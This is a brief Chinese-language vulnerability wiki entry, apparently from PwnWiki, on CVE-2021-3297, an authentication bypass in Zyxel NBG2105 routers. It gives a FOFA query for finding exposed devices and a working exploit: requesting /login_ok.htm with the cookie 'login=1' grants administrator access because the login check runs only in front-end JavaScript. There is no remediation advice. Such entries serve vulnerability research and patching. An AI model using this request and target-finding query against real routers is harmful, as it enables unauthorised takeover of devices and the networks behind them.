Loading
0

CVE-2021-3297 Zyxel NBG2105 身份验证绕过漏洞

免费、自由、人人(PwnWiki.Com)可编辑的漏洞库

,

漏洞影响

Zyxel NBG2105

FOFA

app="ZyXEL-NBG2105"

Xnip2021-04-06 09-32-28.jpg

其中前端文件 /js/util_gw.js 存在前端对 Cookie login参数的校验。

请求如下则会以管理员身份跳转到 home.htm页面。

http://xxx.xxx.xxx.xxx/login_ok.htm

Cookie: login=1;

Xnip2021-04-06 09-36-42.jpg

免费、自由、人人可编辑的漏洞库